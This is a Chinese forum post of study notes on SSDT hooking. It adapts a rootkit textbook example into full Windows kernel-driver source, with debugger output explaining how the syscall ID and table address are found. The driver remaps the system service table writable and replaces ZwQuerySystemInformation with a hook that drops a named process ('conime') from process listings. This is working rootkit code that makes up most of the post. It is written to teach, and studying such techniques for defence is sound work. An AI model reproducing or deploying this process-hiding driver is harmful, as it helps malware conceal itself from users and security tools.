ssdt hook学习笔记 - rookits源码学习

MX7188

刚学HOOK的来看看吧，希望有帮助。

首先推荐的一文章是 随落天才的hook inline对抗r0hook一文，里面对ssdt说得比较明白
还有参照rootkits-安全防护第四章。
然后百度extern  [__declspec(dllimport) ]  #pragma pack(1)  函数指针。等。

这里的原理是，得到ssdt表，然后根据ID号查找ssdt表里的所在的数值，这个数值是指向直正函数的地址，HOOK SSDT是替换这个数值，从而使得当调用zwquerysysteminformation这个API函数时，从ssdt查找到的地址，其实是指向新函数的地址，从而可以过滤。。。。

zwquerysysteminformation的hook原理，请参照安全防护的那个图，及百度他的用法说明。

还有interlockedexchange只改变第一个参数的值。

下面的是第四章的源码，改之。

PS:这个进程时间有用否？

1. #include <ntddk.h>
   
2. //define struct dd !KeServiceDescriptorTable
   
3. typedef struct _SERVICE_DESCRIPTOR_TABLE {
   
4.     PULONG   ServiceTableBase;
   
5.     PULONG  ServiceCounterTableBase;
   
6.     ULONG   NumberOfService;
   
7.     PULONG   ParamTableBase;
   
8. } SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;
   
9. 
   
10. extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
    
11. 
    
12. /**********************************************************************************/
    
13. struct _SYSTEM_THREADS
    
14. {
    
15.   LARGE_INTEGER           KernelTime;
    
16.   LARGE_INTEGER           UserTime;
    
17.   LARGE_INTEGER           CreateTime;
    
18.   ULONG                           WaitTime;
    
19.   PVOID                           StartAddress;
    
20.   CLIENT_ID                       ClientIs;
    
21.   KPRIORITY                       Priority;
    
22.   KPRIORITY                       BasePriority;
    
23.   ULONG                           ContextSwitchCount;
    
24.   ULONG                           ThreadState;
    
25.   KWAIT_REASON            WaitReason;
    
26. };
    
27. 
    
28. struct _SYSTEM_PROCESSES
    
29. {
    
30.   ULONG                           NextEntryDelta;
    
31.   ULONG                           ThreadCount;
    
32.   ULONG                           Reserved[6];
    
33.   LARGE_INTEGER           CreateTime;
    
34.   LARGE_INTEGER           UserTime;
    
35.   LARGE_INTEGER           KernelTime;
    
36.   UNICODE_STRING          ProcessName;
    
37.   KPRIORITY                       BasePriority;
    
38.   ULONG                           ProcessId;
    
39.   ULONG                           InheritedFromProcessId;
    
40.   ULONG                           HandleCount;
    
41.   ULONG                           Reserved2[2];
    
42.   VM_COUNTERS                     VmCounters;
    
43.   IO_COUNTERS                     IoCounters; //windows 2000 only
    
44.   struct _SYSTEM_THREADS          Threads[1];
    
45. };
    
46. // Added by Creative of rootkit.com
    
47. /*struct _SYSTEM_PROCESSOR_TIMES
    
48. {
    
49.   LARGE_INTEGER          IdleTime;
    
50.   LARGE_INTEGER          KernelTime;
    
51.   LARGE_INTEGER          UserTime;
    
52.   LARGE_INTEGER          DpcTime;
    
53.   LARGE_INTEGER          InterruptTime;
    
54.   ULONG              InterruptCount;
    
55. };*/
    
56. /**********************************************************************************/
    
57. 
    
58. /**********************************************************************************/
    
59. ///////////////////////////////////////////////////////////////////////////////////////////
    
60. NTSYSAPI
    
61. NTSTATUS
    
62. NTAPI ZwQuerySystemInformation(
    
63.                  IN ULONG SystemInformationClass,
    
64.                  IN PVOID SystemInformation,
    
65.                  IN ULONG SystemInformationLength,
    
66.                         OUT PULONG ReturnLength);
    
67. //define function point for [ZWQUERYSYSTEMINFORMATION]
    
68. typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
    
69.                        ULONG SystemInformationCLass,
    
70.                        PVOID SystemInformation,
    
71.                        ULONG SystemInformationLength,
    
72.                        PULONG ReturnLength
    
73.                        );
    
74. //define function point var
    
75. ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
    
76. ///////////////////////////////////////////////////////////////////////////////////////////
    
77. /**********************************************************************************/
    
78. 
    
79. 
    
80. /**********************************************************************************/
    
81. PMDL  pMdlSsdt;
    
82. PVOID *ppMapSystemCallTable;
    
83. /**********************************************************************************/
    
84. VOID HookUnload(IN PDRIVER_OBJECT pDriverObject);
    
85. VOID TestPrintf();
    
86. //Hook Function define
    
87. NTSTATUS HookZwQuerySystemInformation(
    
88.                    IN ULONG SystemInformationClass,
    
89.                    IN PVOID SystemInformation,
    
90.                    IN ULONG SystemInformationLength,
    
91.             OUT PULONG ReturnLength);
    
92. /**********************************************************************************/
    
93. 
    
94. 
    
95. NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pUserviceRegPath)
    
96. {
    
97.   pDriverObject->DriverUnload=HookUnload;
    
98. 
    
99. /**********************************************************************************/
    
100. //  Map the memory into our domain so we can change the permissions on the MDL
     
101.   pMdlSsdt = MmCreateMdl(NULL, KeServiceDescriptorTable->ServiceTableBase, KeServiceDescriptorTable->NumberOfService*4);
     
102.   if(!pMdlSsdt)
     
103.   {
     
104.     return STATUS_UNSUCCESSFUL;
     
105.   }  
     
106.   MmBuildMdlForNonPagedPool(pMdlSsdt);  
     
107. //  Change the flags of the MDL
     
108.   pMdlSsdt->MdlFlags = pMdlSsdt->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;  
     
109.     ppMapSystemCallTable = MmMapLockedPages(pMdlSsdt, KernelMode);
     
110. //  MmMapLockedPages地址返回的是同ssdt的地址相同
     
111. /**********************************************************************************/
     
112. //  TestPrintf();
     
113.   /*
     
114.   c=InterlockedExchange(&a,b)
     
115.   把a与b的值交换，并返回a之前的值
     
116.   OldZwQuerySystemInformation是原来函数的值，但现在ZwQuerySystemInformation这个
     
117.   函数在ssdt表里的地址已变成HookZwQuerySystemInformation的地址  
     
118.   */
     
119.   OldZwQuerySystemInformation = (PVOID) InterlockedExchange( (PLONG) &ppMapSystemCallTable[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)], (LONG) HookZwQuerySystemInformation);
     
120.   return STATUS_SUCCESS;
     
121. }
     
122. 
     
123. VOID HookUnload(IN PDRIVER_OBJECT pDriverObject)
     
124. {
     
125.   KdPrint(("HookUnload\n"));
     
126.   InterlockedExchange( (PLONG) &ppMapSystemCallTable[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)], (LONG)OldZwQuerySystemInformation);  
     
127. //  Unlock and Free MDL
     
128.   if(pMdlSsdt)
     
129.   {
     
130.     MmUnmapLockedPages(ppMapSystemCallTable, pMdlSsdt);
     
131.     IoFreeMdl(pMdlSsdt);
     
132.   }
     
133. }
     
134. 
     
135. 
     
136. /**********************************************************************************/
     
137. NTSTATUS HookZwQuerySystemInformation(
     
138.                    IN ULONG SystemInformationClass,
     
139.                    IN PVOID SystemInformation,
     
140.                    IN ULONG SystemInformationLength,
     
141.                    OUT PULONG ReturnLength)
     
142. {
     
143.   
     
144.   NTSTATUS ntStatus;
     
145.   
     
146.   ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
     
147.     SystemInformationClass,
     
148.     SystemInformation,
     
149.     SystemInformationLength,
     
150.     ReturnLength );
     
151.   
     
152.   if( NT_SUCCESS(ntStatus))
     
153.   {
     
154.     // Asking for a file and directory listing
     
155.     if(SystemInformationClass == 5)
     
156.     {
     
157.       // This is a query for the process list.
     
158.       // Look for process names that start with
     
159.       // '_root_' and filter them out.
     
160.       struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
     
161.       struct _SYSTEM_PROCESSES *prev = NULL;
     
162.       
     
163.       while(curr)
     
164.       {
     
165.         //DbgPrint("Current item is %x\n", curr);
     
166.         if (curr->ProcessName.Buffer != NULL)
     
167.         {
     
168.           if(0 == memcmp(curr->ProcessName.Buffer, L"conime", 12))
     
169.           {            
     
170.             if(prev) // Middle or Last entry
     
171.             {
     
172.               if(curr->NextEntryDelta)
     
173.                 prev->NextEntryDelta += curr->NextEntryDelta;
     
174.               else  // we are last, so make prev the end
     
175.                 prev->NextEntryDelta = 0;
     
176.             }
     
177.             else
     
178.             {
     
179.               if(curr->NextEntryDelta)
     
180.               {
     
181.                 // we are first in the list, so move it forward
     
182.                 (char *)SystemInformation += curr->NextEntryDelta;
     
183.               }
     
184.               else // we are the only process!
     
185.                 SystemInformation = NULL;
     
186.             }
     
187.           }
     
188.         }
     
189. 
     
190.         prev = curr;
     
191.         if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
     
192.         else curr = NULL;
     
193.       }
     
194.     }
     
195.    
     
196.   }
     
197.   return ntStatus;
     
198. }
     
199. /**********************************************************************************/
     
200. 
     
201. 
     
202. 
     
203. 
     
204. 
     
205. 
     
206. 
     
207. VOID TestPrintf()
     
208. {
     
209.   ULONG FunAddress,pFunAddress;
     
210. 
     
211.   FunAddress=*(PULONG)((PUCHAR)ZwQuerySystemInformation+1);
     
212.   KdPrint(("%08x\n",FunAddress));//FunAddress=ADh
     
213.   pFunAddress=KeServiceDescriptorTable->ServiceTableBase[FunAddress];
     
214.   KdPrint(("%08x\n",pFunAddress));//pFunAddress=8057e786
     
215.   /*
     
216.   KeServiceDescriptorTable->ServiceTableBase[FunAddress]
     
217.   这个表示KeServiceDescriptorTable中的ID为ADh里的数据，这个数据就是ZwQuerySystemInformation用sysenter指令后
     
218.   在内核里的NtQuerySystemInformation函数的地址。
     
219.   lkd> u 8057e786
     
220.   nt!NtQuerySystemInformation:
     
221.   8057e786 6810020000      push    210h
     
222.   8057e78b 6830ab4e80      push    offset nt!ExTraceAllTables+0x1eb (804eab30)
     
223.   8057e790 e8a64cf6ff      call    nt!_SEH_prolog (804e343b)
     
224.   8057e795 33c0            xor     eax,eax
     
225.   8057e797 8945e4          mov     dword ptr [ebp-1Ch],eax
     
226.   8057e79a 8945dc          mov     dword ptr [ebp-24h],eax
     
227.   8057e79d 8945fc          mov     dword ptr [ebp-4],eax
     
228.   8057e7a0 64a124010000    mov     eax,dword ptr fs:[00000124h]
     
229. 
     
230.   KeServiceDescriptorTable
     
231.   是一张表，他的起始地址是->ServiceTableBase 804e36a8这里，
     
232.   8055a680  804e36a8 00000000 0000011c 80513eb8
     
233.   服务函数0000011c个。
     
234.   804e36a8这个地址开始的就是服务函数的地址
     
235.   lkd> dd 804e36a8
     
236.   804e36a8  80580302 80579b8c 8058b7ae 805907e4
     
237.   804e36b8  805905fe 806377a0 80639931 8063997a
     
238.   804e36c8  8057560b 806481cf 80636f5f 8058fb85
     
239.   804e36d8  8062f0a4 8057be31 8058cc26 806261bd
     
240.   804e36e8  805dcf20 80568f9d 805d9ac1 ffaf38a0
     
241.   804e36f8  804e3cb4 806481bb 805ca22c 804f0e28
     
242.   804e3708  80569649 80567d49 8058fff3 8064e1c1
     
243.   804e3718  8058f8f5 80581225 8064e42f 8058b800
     
244.   上面这些都是函数地址
     
245.   80580302 80579b8c 8058b7ae 805907e4
     
246.   序号为1    2         3        4
     
247.   这里可以说是一个DWORD数组
     
248.   所以序号为ADh的话，就直接用KeServiceDescriptorTable->ServiceTableBase[0xad]得到函数地址
     
249.   */
     
250. 
     
251. 
     
252. //  pFunAddress=(PULONG)ZwQuerySystemInformation;
     
253. //  KdPrint(("%08x\n",pFunAddress));//804de440 函数名是一个地址，是这个函数的起始地址
     
254.   /*
     
255. ////////////////////////////////////////////////////////////////////////////////////////
     
256.   pp=(PULONG)MessageBox;//function address = 77D5058A user32.MessageBoxA
     
257.   0040B548   mov         eax,[__imp__MessageBoxA@16 (00424290)] //eax=77D5058A
     
258.   0040B54D   mov         dword ptr [ebp-10h],eax
     
259. 
     
260.   mov eax,MessageBox ;函数名就是一个地址。call 地址
     
261. //
     
262.     add eax,2 ;地址加2   jmp+地址 =2+4 =6字节
     
263.   mov eax,[eax] ;jmp 的地址
     
264.   mov eax,[eax] ;地址的地址
     
265. //
     
266.   mov eax,DWORD PTR [MessageBox+2]
     
267.   mov eax,DWORD PTR [eax]
     
268. ////////////////////////////////////////////////////////////////////////////////////////
     
269.   调用ZwQuerySystemInformation时进入sysenter的ID是0ADh，系统经查KeServiceDescriptorTable，
     
270.   从而得到NtQuerySystemInformation函数的地址
     
271.   NtQuerySystemInformation这个就是要HOOK的函数
     
272. 
     
273.   0ADh*4+KeServiceDescriptorTable.ntoskrnel.ServiceTableBase(804e36a8)=804e395c
     
274. 
     
275.   lkd> dd !KeServiceDescriptorTable
     
276.   8055a680  804e36a8 00000000 0000011c 80513eb8
     
277.   8055a690  00000000 00000000 00000000 00000000
     
278.   8055a6a0  00000000 00000000 00000000 00000000
     
279.   8055a6b0  00000000 00000000 00000000 00000000
     
280.   8055a6c0  00002730 bf80c25d 00000000 00000000
     
281.   8055a6d0  f971aa80 f8ff99e0 812a70f0 812a7a90
     
282.   8055a6e0  00000000 00000000 00000000 00000000
     
283.   8055a6f0  b5685a40 01ca8e60 00000000 00000000
     
284.   0ADh*4+KeServiceDescriptorTable.ntoskrnel.ServiceTableBase(804e36a8)=804e395c
     
285. 
     
286.   lkd> dd 804e395c
     
287.   804e395c  8057e786 80590ad0 80591857 805871f3
     
288.   804e396c  8056c103 8056d338 80570e3b 8059068f
     
289.   804e397c  804e303a 806477af 805710d8 805dae6c
     
290.   804e398c  8058f6a6 8057b545 8057dbee 80566809
     
291.   804e399c  8058b492 80567272 8065a3d6 8064e029
     
292.   804e39ac  8064e51e 8057f307 8056ae96 8056a9ae
     
293.   804e39bc  80622b92 8062b803 8058aa2c 80576f2a
     
294.   804e39cc  8062b5fc 8059d753 8053c14a 8064d042
     
295. 
     
296.   lkd> u 8057e786
     
297.   nt!NtQuerySystemInformation:
     
298.   8057e786 6810020000      push    210h
     
299.   8057e78b 6830ab4e80      push    offset nt!ExTraceAllTables+0x1eb (804eab30)
     
300.   8057e790 e8a64cf6ff      call    nt!_SEH_prolog (804e343b)
     
301.   8057e795 33c0            xor     eax,eax
     
302.   8057e797 8945e4          mov     dword ptr [ebp-1Ch],eax
     
303.   8057e79a 8945dc          mov     dword ptr [ebp-24h],eax
     
304.   8057e79d 8945fc          mov     dword ptr [ebp-4],eax
     
305.   8057e7a0 64a124010000    mov     eax,dword ptr fs:[00000124h]
     
306. 
     
307. 
     
308. 
     
309.   lkd> u ZwQuerySystemInformation
     
310.   nt!ZwQuerySystemInformation:
     
311.   804de440 b8ad000000      mov     eax,0ADh
     
312.   804de445 8d542404        lea     edx,[esp+4]
     
313.   804de449 9c              pushfd
     
314.   804de44a 6a08            push    8
     
315.   804de44c e8e0110000      call    nt!KiSystemService (804df631)
     
316.   804de451 c21000          ret     10h
     
317.   nt!ZwQuerySystemTime:
     
318.   804de454 b8ae000000      mov     eax,0AEh
     
319.   804de459 8d542404        lea     edx,[esp+4]
     
320.   这里我们要得到的是那个进入sysenter的id，因为函数名表示的地址是指这个地址804de440
     
321.   要得到0ADh这个ID号
     
322.   因为b8ad000000      mov     eax,0ADh这条指令中mov的机器码是b8占一个字节，
     
323.   ad000000这个占四个字节的就是这个ID。[数据存放的方式是低位放在低位，高位放在高位，
     
324.   所以000000ad在内存中的存放是ad000000]
     
325.   (PUCHAR)ZwQuerySystemInformation这个是把8055a680这个地址转为PUCHAR类型指针
     
326.   ((PUCHAR)ZwQuerySystemInformation+1)PUCHAR指针+1，移动的是一个这个类型的大小单位[这里移动一个字节，比如
     
327.   PULONG+1那么这里将会移动四个字节。]所以这时地址在8055a681的地址，其实移动的那个字节就是mov的机器码，下面四个
     
328.   就是这个ID号
     
329.   *(PULONG)((PUCHAR)ZwQuerySystemInformation+1);再把从8055a681开始的指针转为PULONG型地址，四位刚好是那个ID号
     
330.   */
     
331. }
     

复制代码